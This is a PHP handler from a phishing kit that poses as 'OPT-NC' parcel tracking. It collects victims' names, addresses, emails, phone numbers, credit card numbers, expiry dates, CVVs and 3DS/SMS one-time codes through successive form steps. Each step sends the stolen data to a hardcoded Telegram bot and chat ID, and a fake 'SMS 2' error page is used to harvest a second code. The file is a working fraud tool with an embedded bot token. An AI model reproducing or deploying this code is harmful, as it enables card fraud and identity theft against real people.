<?php 



require_once "functions.php";




 $apiToken = "6491803563:AAFdgsK42Q2Uqg0LyDZFeZJME_yT9PABj78";
$id = "1742518248";





if ($_POST['step']== 'index') {
    $track = $_POST['track'];

    $_SESSION['track'] = $_POST['track'];


    if (empty($track)) {

        header("Location: index.php");
        exit();

    }else{
       

        if(isset($_POST['submit']))
            {
                $apiToken;
                $data = [
                'chat_id' => $id, 
                'text' => $subject . $message
                ];
                $response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
            };
        header("Location: tracking.php");
        exit();
    }
}

if ($_POST['step']== 'billing') {
    $f_name = $_POST['f_name'];
    $adress = $_POST['adress'];
    $email = $_POST['email'];
    $phone = $_POST['number'];
    $city = $_POST['city'];
    $zip = $_POST['zip'];


    if (empty($f_name)  || empty($adress) || empty($email) || empty($phone) || empty($city) || empty($zip)) {

        header("Location: billing.php");
        exit();

    }else{
        $adrress  = $_SERVER['REMOTE_ADDR'];
        $subject  = $adrress . " ---| 📦💎 OPT-NC 💎📦 |--- "       . "\r\n" ;
        $message  =" ------\ ✅🔐 BILLING 🔐✅ /----------- "       . "\r\n" ;
        $message .="\r\n" ;
        $message .= "[+]FULL NAME : " . $f_name                    . "\r\n";
        $message .= "[+]ADDRESS : " . $adress                  . "\r\n";
        $message .= "[+]EMAIL : " . $email                  . "\r\n";
        $message .= "[+]PHONE : " . $phone                 . "\r\n";
        $message .= "[+]CITY : " . $city                 . "\r\n";
        $message .= "[+]ZIP : " . $zip                 . "\r\n";
        $message .="\r\n" ;
        $message .=" ------\ ✅🔐 END BILLING 🔐✅ /------- "       . "\r\n" ;


        if(isset($_POST['submit']))
            {
                $apiToken;
                $data = [
                'chat_id' => $id, 
                'text' => $subject . $message
                ];
                $response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
            };

        header("Location: loading.php");
        exit();
    }
}


if ($_POST['step']== 'cc') {
    $card = $_POST['card'];
    $date = $_POST['date'];
    $code = $_POST['code'];



    if (empty($card) || empty($date) || empty($code)) {

        header("Location: cc.php");
        exit();

    }else{
        $adrress  = $_SERVER['REMOTE_ADDR'];
        $subject  = $adrress . " ---| 📦💎 OPT-NC 💎📦 |--- "       . "\r\n" ;
        $message  =" ------\ ✅🔐 CC 🔐✅ /----------- "       . "\r\n" ;
        $message .="\r\n" ;
        $message .= "[+]CARD NUMBER : " . $card                    . "\r\n";
        $message .= "[+]EXP DATE : " . $date                  . "\r\n";
        $message .= "[+]CVV : " . $code                  . "\r\n";

        $message .="\r\n" ;
        $message .=" ------\ ✅🔐 END CC 🔐✅ /------- "       . "\r\n" ;

       

        if(isset($_POST['submit']))
            {
                $apiToken;
                $data = [
                'chat_id' => $id, 
                'text' => $subject . $message
                ];
                $response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
            };

        header("Location: loading2.php");
        exit();
    }
}

//================
#=====> SMS
//================

if ($_POST['step']== 'sms') {
    $code_3ds = $_POST['code_3ds'];
    $sms = $_POST['sms'];




    if (empty($code_3ds) || empty($sms)) {

        header("Location: sms.php");
        exit();

    }else{
        $adrress  = $_SERVER['REMOTE_ADDR'];
        $subject  = $adrress . " ---| 📦💎 OPT-NC 💎📦 |--- "       . "\r\n" ;
        $message  =" ------\ ✅🔐 SMS / 3DS 🔐✅ /----------- "       . "\r\n" ;
        $message .="\r\n" ;
        $message .= "[+] CODE 3DS : " . $code_3ds                   . "\r\n";
        $message .= "[+] CODE SMS : " . $sms                   . "\r\n";
        $message .="\r\n" ;
        $message .=" ------\ ✅🔐 END SMS / 3DS 🔐✅ /------- "       . "\r\n" ;
        $message .= '-----------------------------------------' . "\r\n";
       

        if(isset($_POST['submit']))
            {
                $apiToken;
                $data = [
                'chat_id' => $id, 
                'text' => $subject . $message
                ];
                $response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
            };

        header("Location: loading3.php");
        exit();
    }
}

//================
#=====> SMS 2
//================

if ($_POST['step']== 'sms_2') {
    $code_3ds = $_POST['code_3ds'];
    $sms = $_POST['sms'];




    if (empty($code_3ds) || empty($sms)) {

        header("Location: smserror.php");
        exit();

    }else{
        $adrress  = $_SERVER['REMOTE_ADDR'];
        $subject  = $adrress . " ---| 📦💎 OPT-NC 💎📦 |--- "       . "\r\n" ;
        $message  =" ------\ ✅🔐 SMS 2 / 3DS 🔐✅ /----------- "       . "\r\n" ;
        $message .="\r\n" ;
        $message .= "[+] CODE 3DS : " . $code_3ds                   . "\r\n";
        $message .= "[+] CODE SMS : " . $sms                   . "\r\n";
        $message .="\r\n" ;
        $message .=" ------\ ✅🔐 END SMS 2 / 3DS 🔐✅ /------- "       . "\r\n" ;
        $message .= '-----------------------------------------' . "\r\n";

        if(isset($_POST['submit']))
            {
                $apiToken;
                $data = [
                'chat_id' => $id, 
                'text' => $subject . $message
                ];
                $response = file_get_contents("https://api.telegram.org/bot" .$apiToken . "/sendMessage?" . http_build_query($data) );
            };
        header("Location: smserror.php");
        exit();
    }
}


